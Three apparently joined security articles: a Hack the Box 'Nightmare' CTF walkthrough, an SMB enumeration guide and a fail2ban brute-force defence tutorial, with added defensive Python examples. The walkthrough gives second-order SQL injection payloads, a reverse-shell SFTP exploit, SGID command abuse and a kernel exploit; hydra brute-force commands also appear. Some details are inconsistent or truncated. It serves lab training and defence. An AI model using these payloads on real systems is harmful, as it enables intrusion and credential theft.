Hack the Box: Nightmare Walkthrough


Today we are going to solve another CTF challenge, "Nightmare". It is a retired vulnerable lab presented by Hack the Box to help pentesters perform online penetration testing according to their experience level; they have a collection of vulnerable labs as challenges, from beginner to expert level.
Level: Intermediate
Task: To find user.txt and root.txt file
Note: Since these labs are available online, they have a static IP. The IP of Nightmare is 10.10.10.66
Penetrating Methodology
· Network scanning (Nmap)
· Browsing the IP address over HTTP
· Checking for SQL injection vulnerability
· Exploiting second-order SQL injection
· Login through SSH
· Login through SFTP
· Exploiting SFTP to gain a reverse shell
· Discovering files with the SGID bit set
· Privilege escalation using "sls"
· Finding an exploit for the kernel
· Making changes to the exploit
· Getting root privileges using the exploit
· Getting the root flag
Walkthrough
Let’s start off with our basic nmap command to find out the open ports and services.
nmap -sC -sV 10.10.10.66
The Nmap output shows us that there are 4 ports open: 80(HTTP), 2222(SSH)
We find that port 80 is running HTTP, so we open the IP in our browser.
When we visit the webpage, we find a login page. After trying a few SQL injection payloads we find that this page is vulnerable to "second-order SQL injection". This means that to exploit this vulnerability we have to register a user whose username carries our SQL injection query and then log in with the same username.
First we register a user with the credentials "admin'):pass" using the register link on the login page. When we log in with this user we get an SQL error on the web page.
Having confirmed that the web application is vulnerable to second-order SQL injection, we now find the number of columns. We register a user with the following credentials:
Username: admin ') order by 3#
Password: pass
We keep the same password for every user we register.
Now when we log in, we get an SQL error, which means the table has fewer than three columns. So we register another user using the following query:
admin ') order by 2#
When we log in, there is no SQL error, which means the table has 2 columns.
Now we are going to find the version of the SQL database the application is running. To find the database version we register with the following query:
admin') union select 1, @@version#
After finding the version we know that it is a MySQL database. Now we find the name of the database. To find the name of the current database we register with the following query:
admin') union select 1, database()#
Now we find that the current database is called "notes", but we want the names of all the databases on the server. So we register a user using the following query:
admin') union select 1, group_concat(distinct table_schema) from information_schema.tables#
We get another database called "sysadmin"; next we find the table names inside "sysadmin". To find the table names we register a user with the following query:
admin') union select 1, group_concat(distinct table_name) from information_schema.columns where table_schema="sysadmin"#
We find two tables called "users" and "configs"; we now find the column names inside the "users" table. To find the column names we register a user with the following query:
admin') union select 1, group_concat(distinct column_name) from information_schema.columns where table_schema="sysadmin" and table_name="users"#
Now we find two columns called "username" and "password". To dump the data inside these columns we register a user with the following query:
admin') union select 1, group_concat(username, 0x7c, password, 0x0a) from sysadmin.users#
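The queries above only work because the application trusts a value it stored earlier. Here is that pattern beside its fix, as an added Python example that is not from the lab or the original article: SQLite stands in for MySQL (so the payload's comment token is `--` rather than `#`), and the schema, table names and the `PAYLOAD` string are constructed for the demo.

```python
import sqlite3

# SQLite stands in for the MySQL "notes" app, so the comment token is "--" not "#".
# The payload mirrors the page's "admin') union select ...#" shape (constructed).
PAYLOAD = "admin') UNION SELECT 1, secret FROM app_config--"

def make_db():
    """Constructed schema: users, their notes, and a table the attacker wants."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE users (username TEXT, password TEXT);
        CREATE TABLE notes (id INTEGER, owner TEXT, body TEXT);
        CREATE TABLE app_config (secret TEXT);
        INSERT INTO notes VALUES (1, 'alice', 'hello');
        INSERT INTO app_config VALUES ('constructed-secret');
    """)
    return db

def register(db, username, password):
    # First order is safe: the parameterized INSERT stores the payload as inert text.
    db.execute("INSERT INTO users VALUES (?, ?)", (username, password))

def authenticate(db, username, password):
    # Also parameterized; hands back the username exactly as stored in the table.
    row = db.execute("SELECT username FROM users WHERE username = ? AND password = ?",
                     (username, password)).fetchone()
    return row[0] if row else None

def notes_vulnerable(db, stored_name):
    # Second-order sink: the value came from our own database, so the code trusts it
    # and splices it into a new statement. The payload stored at registration now runs.
    sql = "SELECT id, body FROM notes WHERE (owner = '%s')" % stored_name
    return db.execute(sql).fetchall()

def notes_hardened(db, stored_name):
    # Same query with a bound parameter: the payload is just an owner name that matches
    # nothing. Trust depends on how a value is used, not on where it was read from.
    return db.execute("SELECT id, body FROM notes WHERE (owner = ?)", (stored_name,)).fetchall()

def login_and_list(db, username, password, fetch):
    """Log in, then list the user's notes via the given fetch function; None on bad creds."""
    stored = authenticate(db, username, password)
    return None if stored is None else fetch(db, stored)

if __name__ == "__main__":
    db = make_db()
    register(db, PAYLOAD, "pass")
    register(db, "alice", "pw")
    print("vulnerable:", login_and_list(db, PAYLOAD, "pass", notes_vulnerable))
    print("hardened:  ", login_and_list(db, PAYLOAD, "pass", notes_hardened))
    print("alice:     ", login_and_list(db, "alice", "pw", notes_hardened))
```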
Now we have several username/password pairs; we try to log in through SSH using these credentials and find that we can authenticate with "ftpuser:@whereyougo?". We are unable to get a shell over SSH, so instead we connect using SFTP and log in successfully.
ssh -p 2222 ftpuser@10.10.10.66
sftp -p 2222 ftpuser@10.10.10.66
As we are not able to get a shell using SSH, we looked for an SFTP exploit and found one. You can download the exploit from here.
We modified the exploit so that it gives us a reverse shell.
After making the changes, we set up a netcat listener and run the script.
python sftp-exploit.py
On our listener we get a reverse shell.
nc -lvp 443
After getting the reverse shell we spawn a TTY shell. Inside the /home/decoder/ directory we find a directory called "test" and a file called "user.txt". As they belong to the "decoder" group, we look for files that belong to the "decoder" group.
python -c "import pty; pty.spawn('/bin/bash')"
find / -group "decoder" 2>/dev/null
Running the sls command we find that it is a binary that runs the ls command. It also has the SGID bit set, so we can abuse this to escalate our privileges.


We use the strings command to inspect the binary and find that it uses the system function to execute the "ls" command.
strings /usr/bin/sls
As the ls command is executed inside a system() call, we are going to use the -b argument to execute our command.
sls -b '
bash -p
After getting a shell we run the "id" command and find that we have spawned a shell as user "decoder". We can now open the "user.txt" file and find the first flag.
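The `find` and `strings` checks above generalize into a small audit a defender can run before an attacker does: an added Python example, not from the lab or the article, that lists every setuid/setgid regular file under a root and flags those that embed the `system` symbol name, the sls pattern. The NUL-delimited byte search only approximates `strings`, and `make_sample` writes a constructed fake binary so the demo runs without touching real system files.

```python
import os
import stat
import tempfile

SKIP_DIRS = {"/proc", "/sys", "/dev", "/run"}  # pseudo-filesystems: nothing to audit, slow to walk

def special_bits(mode):
    """Name the setuid/setgid bits in a stat() mode, e.g. 0o2755 -> ['sgid']."""
    bits = []
    if mode & stat.S_ISUID:
        bits.append("suid")
    if mode & stat.S_ISGID:
        bits.append("sgid")
    return bits

def mentions_system(path, chunk=1 << 16):
    """Crude `strings binary | grep -w system`: find the NUL-terminated symbol name."""
    needle = b"\x00system\x00"
    carry = b""
    with open(path, "rb") as f:
        while True:
            block = f.read(chunk)
            if not block:
                return False
            if needle in carry + block:
                return True
            carry = block[-(len(needle) - 1):]  # tail, in case the needle straddles chunks

def audit(root="/"):
    """(path, bits, mentions_system) for every regular file under root with a
    setuid/setgid bit. One that also embeds 'system' is the sls pattern: a shell
    command built from user input runs as the file's owner or group."""
    findings = []
    for dirpath, dirnames, filenames in os.walk(root):
        dirnames[:] = [d for d in dirnames if os.path.join(dirpath, d) not in SKIP_DIRS]
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)  # lstat: do not follow symlinks
            except OSError:
                continue
            if not stat.S_ISREG(st.st_mode):
                continue
            bits = special_bits(st.st_mode)
            if bits:
                try:
                    uses = mentions_system(path)
                except OSError:
                    uses = None  # unreadable; still report the special bits
                findings.append((path, bits, uses))
    return findings

def make_sample(directory):
    """Constructed sample: a fake setgid 'binary' that embeds the system symbol."""
    path = os.path.join(directory, "fake-sls")
    with open(path, "wb") as f:
        f.write(b"\x7fELF" + b"\x00" * 12 + b"\x00system\x00ls -la\x00")
    os.chmod(path, 0o2755)
    return path

if __name__ == "__main__":
    sample_dir = tempfile.mkdtemp()  # audit a throwaway directory, not "/"
    make_sample(sample_dir)
    for path, bits, uses in audit(sample_dir):
        print(path, bits, "mentions system()" if uses else "")
```

Run `audit("/")` as root on a real host to get the full list; review every hit that mentions `system` by hand.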
Enumerating the system, we check the kernel version to see whether any privilege escalation exploit is available for it.
uname -a
We find that the version of kernel is vulnerable to this exploit here.
We download the code to our machine and compile it using gcc. Then we start a Python HTTP server and send the compiled exploit to the target machine. When we run the exploit we are unable to get a privileged shell, as it shows an error saying that the kernel version is not recognized.
In kali machine:
gcc -o priv 43418.c
python -m SimpleHTTPServer 80
On target machine:
chmod +x priv
./priv
Now we have to make a few changes for the exploit to work, so we open the C file again and make the changes.


Now we compile again and send the file to the target machine. This time when we run the file we get an error saying permission denied on set_groups.
So we exit the shell and run the exploit as ftpuser. As soon as we run the exploit we get a root shell.
We go to the /root directory and find a file called "root.txt". When we open the file we get the final flag.

A Little Guide to SMB Enumeration



Enumeration is an essential phase of penetration testing: once a pentester has established an active connection with the victim, they try to retrieve as much information as possible about the victim's machine, which could be useful for further exploitation.
In this article, we explore SMB enumeration using only the command-line tools built into Kali Linux.

Table of Content
§ nmblookup
§ nbtscan
§ SMBMap
§ smbclient
§ rpcclient
§ Nmap
§ Enum4linux

nmblookup
nmblookup is used to query NetBIOS names and map them to IP addresses in a network using NetBIOS over TCP/IP queries. The options allow the name queries to be directed at a particular IP broadcast area or to a particular machine. All queries are done over UDP.
nmblookup -A 192.168.1.103
nmblookup is a helpful command for enumerating the domain/workgroup, workstation name and MAC address. NetBIOS names carry a one-byte suffix that states which service the name belongs to, as follows:

For unique names:
    00: Workstation Service (workstation name)
    03: Windows Messenger service
    06: Remote Access Service
    20: File Service (also called Host Record)
    21: Remote Access Service client
    1B: Domain Master Browser – Primary Domain Controller for a domain
    1D: Master Browser

For group names:
    00: Workstation Service (workgroup/domain name)
    1C: Domain Controllers for a domain
    1E: Browser Service Elections
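To put the suffix tables to use, here is an added Python example (not from the article) that decodes `nmblookup -A` output into roles using exactly those tables and summarizes host name, workgroup/domain, DC and browser roles and MAC; the `SAMPLE` text is constructed in the shape of that output, not a real capture.

```python
import re

# NetBIOS suffix meanings, transcribed from the two lists above.
UNIQUE_SUFFIXES = {
    "00": "Workstation Service (workstation name)",
    "03": "Windows Messenger service",
    "06": "Remote Access Service",
    "20": "File Service (also called Host Record)",
    "21": "Remote Access Service client",
    "1B": "Domain Master Browser (Primary Domain Controller for a domain)",
    "1D": "Master Browser",
}
GROUP_SUFFIXES = {
    "00": "Workstation Service (workgroup/domain name)",
    "1C": "Domain Controllers for a domain",
    "1E": "Browser Service Elections",
}

ENTRY = re.compile(  # one name-table row: NAME  <hh> - [<GROUP>] node-type <STATE>
    r"^\s*(?P<name>\S.*?)\s+<(?P<suffix>[0-9A-Fa-f]{2})>\s+-\s+"
    r"(?P<group><GROUP>)?\s*(?P<node>[BPMH])\s+<(?P<state>[A-Z]+)>"
)
MAC = re.compile(r"MAC Address\s*=\s*([0-9A-Fa-f-]{17})")

# Constructed output in the shape `nmblookup -A` prints (not a real capture).
SAMPLE = """\
Looking up status of 192.168.1.103
\tMETASPLOITABLE  <00> -         B <ACTIVE>
\tMETASPLOITABLE  <03> -         B <ACTIVE>
\tMETASPLOITABLE  <20> -         B <ACTIVE>
\t..__MSBROWSE__. <01> - <GROUP> B <ACTIVE>
\tWORKGROUP       <00> - <GROUP> B <ACTIVE>
\tWORKGROUP       <1d> -         B <ACTIVE>
\tWORKGROUP       <1e> - <GROUP> B <ACTIVE>
\tMAC Address = 00-0C-29-00-00-00
"""

def parse_nmblookup(text):
    """Decode each name-table row into name, suffix, unique/group flag and role."""
    entries = []
    for line in text.splitlines():
        m = ENTRY.match(line)
        if not m:
            continue  # header and MAC lines are not name-table rows
        suffix = m.group("suffix").upper()
        is_group = m.group("group") is not None
        table = GROUP_SUFFIXES if is_group else UNIQUE_SUFFIXES
        entries.append({"name": m.group("name"), "suffix": suffix, "group": is_group,
                        "role": table.get(suffix, "unknown suffix")})
    return entries

def _first(entries, suffix, group):
    return next((e["name"] for e in entries if e["suffix"] == suffix and e["group"] == group), None)

def summarize(text):
    """What an enumerator reads off first: host, workgroup/domain, DC and browser roles, MAC."""
    entries = parse_nmblookup(text)
    mac = MAC.search(text)
    return {
        "hostname": _first(entries, "00", False),
        "workgroup": _first(entries, "00", True),
        "domain_controller": _first(entries, "1C", True) is not None,
        "master_browser": _first(entries, "1D", False) is not None,
        "mac": mac.group(1) if mac else None,
    }
```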

nbtscan
nbtscan is a command-line utility that scans for NetBIOS name servers on a local or remote TCP/IP network; it is a first step in finding open shares. It is built on the functionality of the standard Windows tool "nbtstat", but it works on a whole subnet instead of a single IP.
nbtscan 192.168.1.1/24
As you can observe, it dumps almost the same result as above, but the important difference is that it enumerates the whole subnet.

SMBMap
SMBMap allows users to enumerate samba share drives across an entire domain. List share drives, drive permissions, share contents, upload/download functionality, file name auto-download pattern matching, and even execute remote commands. This tool was designed with pen testing in mind, and is intended to simplify searching for potentially sensitive data across large networks.
smbmap -H 192.168.1.102
smbmap -H 192.168.1.102 -d metasploitable -u msfadmin -p msfadmin
As you can observe, this tool not only shows the shares but also their permissions. If you look at the second command, you will see that it shows the permissions for the user "msfadmin".
Smbclient
smbclient is a client that can 'talk' to an SMB/CIFS server. It offers an interface similar to that of the ftp program. Operations include getting files from the server to the local machine, putting files from the local machine on the server, retrieving directory information from the server and so on.
smbclient -L 192.168.1.102
smbclient //192.168.1.102/tmp

As you can observe, with the help of smbclient we are able to view the shared folders of the victim's machine. Moreover, we can use smbclient to transfer files over the network: here you can observe that we logged in successfully using an anonymous login and transferred the user.txt file.

Rpcclient
rpcclient is a utility initially developed to test MS-RPC functionality in Samba itself. It has undergone several stages of development and stability. Many system administrators have now written scripts around it to manage Windows NT clients from their UNIX workstation.
We can use rpcclient to open an authenticated SMB session to a target machine by running the below command on our system where we have used a NULL Session, as we have entered a username of "".
rpcclient -U "" -N 192.168.1.102
enumdomusers

Next we used the enumdomusers command, and you can see the user names as well as their RIDs (the suffix of their SID) in hexadecimal form.

We use the queryuser command to collect all kinds of information about an individual user based solely on the user's RID in hex form; here RID 0x3e8 denotes the root user account.
queryuser 0x3e8
Note that the output shows the last logon time for the user root, as well as the time the password was last set. Such details are very valuable for penetration testers, and all of this can be achieved without an admin username and password.
Nmap
The following script attempts to detect whether a Microsoft SMBv1 server is vulnerable to a remote code execution vulnerability (MS17-010, a.k.a. EternalBlue). The vulnerability was actively exploited by the WannaCry and Petya ransomware and other malware.
nmap --script smb-vuln* -p 139,445 192.168.1.103
The script connects to the IPC$ tree, executes a transaction on FID 0 and checks whether the error "STATUS_INSUFF_SERVER_RESOURCES" is returned to determine that the target is not patched against MS17-010. Additionally it checks for known error codes returned by patched systems.

In the image below you can observe that it found the target machine vulnerable to MS17-010 because of SMBv1.
Enum4linux
Enum4linux is a tool for enumerating information from Windows and Samba systems. It attempts to offer similar functionality to enum.exe, formerly available from www.bindview.com.
It is written in Perl and is basically a wrapper around the Samba tools smbclient, rpcclient, net and nmblookup.
The tool's key features are listed below, followed by an example.
Key features:
  • RID cycling (When RestrictAnonymous is set to 1 on Windows 2000)
  • User listing (When RestrictAnonymous is set to 0 on Windows 2000)
  • Listing of group membership information
  • Share enumeration
  • Detecting if host is in a workgroup or a domain
  • Identifying the remote operating system
  • Password policy retrieval (using polenum)

enum4linux -a 192.168.1.102
As you can observe, it shows that the target belongs to a workgroup and dumps the NetBIOS names along with their suffixes and much more information.

It also enumerates users along with their RIDs in hexadecimal form with the help of rpcclient. Hence enum4linux is a Swiss-army knife for enumeration, but it cannot identify SMB vulnerabilities the way Nmap can.

Defend against Brute Force Attack with Fail2ban


Daily we hear news related to cybercrime, such as malicious users or bots successfully defacing a publicly accessible website or service. As we always try to explain through our articles, such activities are possible when a system is weakly configured or misconfigured. Therefore, it is important to build security measures such as an IDS/IPS into the firewall to defend your server and clients while configuring it.
In this article we will show how you can protect your network and its running services from brute force attacks.
And the answer is: by implementing an IPS in your network.

Table of Content
· What is an IPS?
· Introduction to fail2ban
· Lab Set-up Requirement
· Brute Force Attack in Absence of IPS
· Intrusion Prevention Lab Set-Up
· Configure Fail2Ban
· Protect SSH Against Brute Force Attack
· Testing Fail2ban
· How to unban IP in fail2ban for SSH
· Protect FTP against Brute Force Attack
· Testing Fail2ban for VSFTP
· Unban IP for VSFTPD

What is an IPS?
Intrusion Prevention System, IPS for short, is a network security measure that examines incoming traffic to perform intrusion detection and then blocks the detected incidents. For example, an IPS can drop malicious packets or ban the traffic coming from an offending IP address.

Introduction to fail2ban

Fail2ban scans log files (e.g. /var/log/apache/error_log) and bans IPs that show the malicious signs -- too many password failures, seeking for exploits, etc. Generally Fail2Ban is then used to update firewall rules to reject the IP addresses for a specified amount of time.
In this article, I will discuss how to prevent your running services against brute force attack using fail2ban.
Source: https://www.fail2ban.org/wiki/index.php/Main_Page
Lab Set-up Requirement
Victim’s Machine: Ubuntu 14.04  (192.168.0.105)
Pentester’s Machine: Kali Linux (192.168.0.105)

Brute Force Attack in Absence of IPS
Now let's launch a brute force attack against port 22, which is open on the target, to attempt an unauthorized login. With the help of hydra we will try to guess the SSH login credentials.
hydra -L user.txt -P pass.txt 192.168.0.105 ssh
As you can observe in the above image, it has successfully found aarti:123 for the SSH login. Similarly, let's launch a brute force attack against port 21, which is open on the target, to attempt an unauthorized login. With the help of hydra we will try to guess the FTP login credentials.
hydra -L user.txt -P pass.txt 192.168.0.105 ftp
From the image below you can observe how badly these services are configured. The network administrator has not even followed password complexity rules; as a result, it is very easy to brute force such a network.
Intrusion Prevention Lab Set-Up
Therefore, I decided to set up an Intrusion Prevention System in this network, which will monitor incoming packets, detect malicious activity and block the traffic coming from the offending IP. It is very easy to install fail2ban, as Ubuntu already has a fail2ban package in its apt repositories.

First of all, let me show you the iptables rule list, which is empty as shown in the image below, and then execute the installation command. Once it completes, copy the configuration from the jail.conf file into a jail.local file.

sudo iptables -S
sudo apt-get install fail2ban
NOTE: To configure fail2ban on your machine you must have root access or use a non-root user with sudo rights.

Configure Fail2Ban
The fail2ban service keeps its default configuration in the file "jail.conf" in the /etc/fail2ban directory. You should not edit this file directly; instead, copy it to jail.local with the command below and then open that file to configure it as per your requirements.
Above you saw that we successfully launched brute force attacks on SSH and FTP, so I will configure fail2ban to stop brute force attacks in the network.
sudo cp /etc/fail2ban/jail.conf /etc/fail2ban/jail.local
sudo gedit /etc/fail2ban/jail.local
Once the file is open you need to focus on a few settings, "ignoreip", "bantime" and "maxretry", and modify their values as per your requirement. Set the IPs you want fail2ban to ignore in ignoreip, set the ban time (in seconds) for which an offending IP stays blocked, and set the maximum number of attempts a user is allowed.

ignoreip = 192.168.0.105 127.0.0.1
bantime = 600
maxretry = 3

Protect SSH Against Brute Force Attack
Finally we come to the portion of the configuration file which deals with specific services. These are identified by section headers, such as [ssh].
To enable one of these sections, uncomment the [ssh] header and set the enabled value to "true" as shown in the image below, then save the jail.local file and restart the fail2ban service:
[ssh]
enabled = true
service fail2ban restart
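To see how ignoreip, bantime and maxretry combine once the ssh jail is enabled, here is an added Python example, not part of the article or of fail2ban itself, that replays constructed auth.log lines against the values set above; it assumes fail2ban's default findtime of 600 seconds and matches only the "Failed password" form of the sshd log line.

```python
import re
from datetime import datetime, timedelta

# Jail settings from the jail.local values above. findtime is fail2ban's default
# 10-minute window: an assumption here, the article does not set it.
IGNOREIP = {"192.168.0.105", "127.0.0.1"}
MAXRETRY = 3
BANTIME = timedelta(seconds=600)
FINDTIME = timedelta(seconds=600)

# One common form of the sshd line the ssh filter keys on.
FAILED = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2}\s+\d{1,2} \d{2}:\d{2}:\d{2}) \S+ sshd\[\d+\]: "
    r"Failed password for (?:invalid user )?\S+ from (?P<ip>\d{1,3}(?:\.\d{1,3}){3}) port \d+"
)

# Constructed auth.log excerpt: .104 fails 3 times within seconds, the ignored
# host .105 fails too, and 10.0.0.9 fails slowly (15-20 minutes apart).
SAMPLE_LOG = """\
Feb 12 10:15:01 ubuntu sshd[2101]: Failed password for invalid user aarti from 192.168.0.104 port 51234 ssh2
Feb 12 10:15:03 ubuntu sshd[2101]: Failed password for invalid user aarti from 192.168.0.104 port 51236 ssh2
Feb 12 10:15:05 ubuntu sshd[2103]: Failed password for root from 192.168.0.104 port 51238 ssh2
Feb 12 10:15:06 ubuntu sshd[2105]: Failed password for root from 192.168.0.105 port 40001 ssh2
Feb 12 10:15:07 ubuntu sshd[2105]: Failed password for root from 192.168.0.105 port 40002 ssh2
Feb 12 10:15:08 ubuntu sshd[2105]: Failed password for root from 192.168.0.105 port 40003 ssh2
Feb 12 10:16:00 ubuntu sshd[2120]: Accepted password for aarti from 192.168.0.110 port 51300 ssh2
Feb 12 10:20:00 ubuntu sshd[2130]: Failed password for admin from 10.0.0.9 port 33000 ssh2
Feb 12 10:40:00 ubuntu sshd[2131]: Failed password for admin from 10.0.0.9 port 33001 ssh2
Feb 12 10:55:00 ubuntu sshd[2132]: Failed password for admin from 10.0.0.9 port 33002 ssh2
"""

def parse_ts(ts, year):
    return datetime.strptime(f"{year} {ts}", "%Y %b %d %H:%M:%S")  # syslog has no year

def find_bans(lines, year=2019):
    """Replay auth.log lines and return {ip: ban_expiry}, applying ignoreip,
    maxretry within findtime, and bantime the way the ssh jail does."""
    recent = {}  # ip -> failure timestamps still inside the findtime window
    bans = {}
    for line in lines:
        m = FAILED.search(line)
        if not m:
            continue  # not a failed login (e.g. the "Accepted password" line)
        ip, ts = m.group("ip"), parse_ts(m.group("ts"), year)
        if ip in IGNOREIP or (ip in bans and ts < bans[ip]):
            continue  # whitelisted, or already banned and the ban has not expired
        window = [t for t in recent.get(ip, []) if ts - t <= FINDTIME] + [ts]
        recent[ip] = window
        if len(window) >= MAXRETRY:
            bans[ip] = ts + BANTIME  # what "fail2ban-client status ssh" would list
            recent[ip] = []
    return bans

if __name__ == "__main__":
    for ip, until in find_bans(SAMPLE_LOG.splitlines()).items():
        print(f"banned {ip} until {until:%H:%M:%S}")
```

Note that the slow attacker at 10.0.0.9 never trips maxretry because each failure falls outside the previous findtime window, which is why findtime deserves as much thought as maxretry.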
Testing Fail2ban for SSH
Fail2ban provides the "fail2ban-client" command for controlling fail2ban from the command line. To check that fail2ban is running and the SSH jail is enabled, use the following syntax to confirm its status.

Syntax: fail2ban-client COMMAND
sudo fail2ban-client status
sudo fail2ban-client status ssh

As you can observe, the filter list and action list currently show 0, or as I would say, they are empty. These values will change if someone exceeds the maxretry limit.

As said above, fail2ban updates the iptables rules to reject IP addresses for a specified amount of time, and in the image below you can observe that the last 3 rules were created automatically by fail2ban.
Now let's test the host machine against a brute force attack on SSH login once again:
hydra -L user.txt -P pass.txt 192.168.0.105 ssh

And as you can observe, this time we get a "Connection refused" error while brute forcing port 22.
Hmm!! Not bad; let's also check the status of the ssh jail after this attack.
sudo fail2ban-client status ssh

Now you can observe in the image below that it shows 1 banned IP: 192.168.0.104; anybody can explore the log file too for more details.

tail /var/log/auth.log

How to unban IP in fail2ban for SSH
If you wish to unban the IP, you can again use fail2ban-client commands, as done here:
fail2ban-client -i
set ssh unbanip 192.168.0.104
exit
sudo fail2ban-client status ssh

When you check the ssh jail status one more time, it will no longer show any IP in the IP list.

Protect FTP against Brute Force Attack
Similarly, to enable the FTP section, uncomment the [vsftpd] header and set the enabled line to "true" as shown in the image below; you can also modify maxretry or the log file path as per your requirement.
[vsftpd]
enabled = true
maxretry = 3




Testing Fail2ban for VSFTPD
Now save the jail.local file, restart the fail2ban service and then check fail2ban and its jail status, including the iptables rules.
sudo service fail2ban restart
sudo fail2ban-client status
sudo fail2ban-client status vsftpd
iptables -S
From the above commands we conclude that there are now two jails, ssh and vsftpd, and that some new fail2ban rules have been created in iptables.
Now let's test the host machine against a brute force attack on FTP login:
hydra -L user.txt -P pass.txt 192.168.0.105 ftp

And as you can observe, this time we get a connection refused error during the brute force attack; let's check the status of the vsftpd jail once again.
sudo fail2ban-client status vsftpd

Yet again you can observe in the image below that it shows 1 banned IP: 192.168.0.104; anybody can check the log file too for more details.
tail /var/log/vsftpd.log


And look at the vsftpd log file: it contains all the details related to the login attempts.
Unban IP in fail2ban for VSFTPD
If you wish to unban or unblock the IP, you can again use fail2ban-client commands, as done here:
sudo fail2ban-client -i
set vsftpd unbanip 192.168.0.104
exit
sudo fail2ban-client status vsftpd
When you check the vsftpd jail status once again, it will no longer show any IP in the IP list.



I hope you enjoy this article and find it helpful in your network penetration testing; you can do much more with fail2ban to secure your network.